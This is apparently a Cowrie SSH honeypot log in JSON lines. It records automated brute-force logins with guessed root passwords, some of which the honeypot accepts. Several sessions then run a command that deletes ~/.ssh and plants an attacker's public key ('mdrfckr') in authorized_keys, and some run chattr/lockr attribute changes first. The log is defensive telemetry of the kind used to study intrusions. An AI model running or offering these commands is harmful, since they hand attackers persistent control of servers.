{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:35.033982Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:28:35.501184Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:28:35.501838Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:28:35.699861Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:35.701085Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":58702,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4d4cc141f35","protocol":"ssh","message":"New connection: 152.32.129.236:58702 (1.2.3.4:22) [session: d4d4cc141f35]","sensor":"my-vps","timestamp":"2025-09-09T00:28:35.894634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:35.895568Z","src_ip":"152.32.129.236","session":"d4d4cc141f35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:36.091129Z","src_ip":"152.32.129.236","session":"d4d4cc141f35"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:28:36.915785Z","src_ip":"152.32.129.236","session":"d4d4cc141f35"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:38.114108Z","src_ip":"152.32.129.236","session":"d4d4cc141f35"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":58706,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b72832316cc","protocol":"ssh","message":"New connection: 152.32.129.236:58706 (1.2.3.4:22) [session: 7b72832316cc]","sensor":"my-vps","timestamp":"2025-09-09T00:28:38.430045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:38.430912Z","src_ip":"152.32.129.236","session":"7b72832316cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:38.687784Z","src_ip":"152.32.129.236","session":"7b72832316cc"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":59952,"dst_ip":"1.2.3.4","dst_port":22,"session":"50f775bd4c5f","protocol":"ssh","message":"New connection: 43.156.132.147:59952 (1.2.3.4:22) [session: 50f775bd4c5f]","sensor":"my-vps","timestamp":"2025-09-09T00:28:39.203529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:39.204981Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:39.454814Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:28:39.759244Z","src_ip":"152.32.129.236","session":"7b72832316cc"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:39.958964Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:40.018003Z","src_ip":"152.32.129.236","session":"7b72832316cc"}
{"eventid":"cowrie.login.success","username":"root","password":"123qweasdZXC","message":"login attempt [root/123qweasdZXC] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:28:40.494020Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:28:41.015959Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:28:41.016751Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:28:41.017954Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:41.269393Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:28:41.851812Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:28:41.852502Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:28:42.098377Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:42.099637Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":59964,"dst_ip":"1.2.3.4","dst_port":22,"session":"afb81f119759","protocol":"ssh","message":"New connection: 43.156.132.147:59964 (1.2.3.4:22) [session: afb81f119759]","sensor":"my-vps","timestamp":"2025-09-09T00:28:42.341539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:42.342242Z","src_ip":"43.156.132.147","session":"afb81f119759"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:42.586378Z","src_ip":"43.156.132.147","session":"afb81f119759"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:28:43.602843Z","src_ip":"43.156.132.147","session":"afb81f119759"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:44.849907Z","src_ip":"43.156.132.147","session":"afb81f119759"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":59980,"dst_ip":"1.2.3.4","dst_port":22,"session":"c091f5e11074","protocol":"ssh","message":"New connection: 43.156.132.147:59980 (1.2.3.4:22) [session: c091f5e11074]","sensor":"my-vps","timestamp":"2025-09-09T00:28:45.098105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:45.098894Z","src_ip":"43.156.132.147","session":"c091f5e11074"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:45.350695Z","src_ip":"43.156.132.147","session":"c091f5e11074"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:28:46.390857Z","src_ip":"43.156.132.147","session":"c091f5e11074"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:46.641379Z","src_ip":"43.156.132.147","session":"50f775bd4c5f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:46.642348Z","src_ip":"43.156.132.147","session":"c091f5e11074"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49812,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2a9f7ec880e","protocol":"ssh","message":"New connection: 212.227.125.160:49812 (1.2.3.4:22) [session: e2a9f7ec880e]","sensor":"my-vps","timestamp":"2025-09-09T00:29:03.377455Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-09-09T00:29:03.380501Z","src_ip":"212.227.125.160","session":"e2a9f7ec880e"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:03.381366Z","src_ip":"212.227.125.160","session":"e2a9f7ec880e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44898,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3fd24f22030","protocol":"ssh","message":"New connection: 212.227.125.160:44898 (1.2.3.4:22) [session: b3fd24f22030]","sensor":"my-vps","timestamp":"2025-09-09T00:29:04.357952Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:04.391376Z","src_ip":"212.227.125.160","session":"b3fd24f22030"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:04.393170Z","src_ip":"212.227.125.160","session":"b3fd24f22030"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39608,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae2f70575d80","protocol":"ssh","message":"New connection: 212.227.235.229:39608 (1.2.3.4:22) [session: ae2f70575d80]","sensor":"my-vps","timestamp":"2025-09-09T00:29:08.319570Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-09-09T00:29:08.320415Z","src_ip":"212.227.235.229","session":"ae2f70575d80"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:08.321195Z","src_ip":"212.227.235.229","session":"ae2f70575d80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39636,"dst_ip":"1.2.3.4","dst_port":22,"session":"5593977f8b98","protocol":"ssh","message":"New connection: 212.227.235.229:39636 (1.2.3.4:22) [session: 5593977f8b98]","sensor":"my-vps","timestamp":"2025-09-09T00:29:11.168996Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:11.169818Z","src_ip":"212.227.235.229","session":"5593977f8b98"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:11.170707Z","src_ip":"212.227.235.229","session":"5593977f8b98"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":39440,"dst_ip":"1.2.3.4","dst_port":22,"session":"340de8448018","protocol":"ssh","message":"New connection: 51.250.72.176:39440 (1.2.3.4:22) [session: 340de8448018]","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.427768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.428717Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.467129Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.login.success","username":"root","password":"password2017","message":"login attempt [root/password2017] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.663621Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:29:14.792179Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.792940Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.793734Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:14.833117Z","src_ip":"51.250.72.176","session":"340de8448018"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:29:14.927272Z","src_ip":"51.250.72.176","session":"340de8448018"}
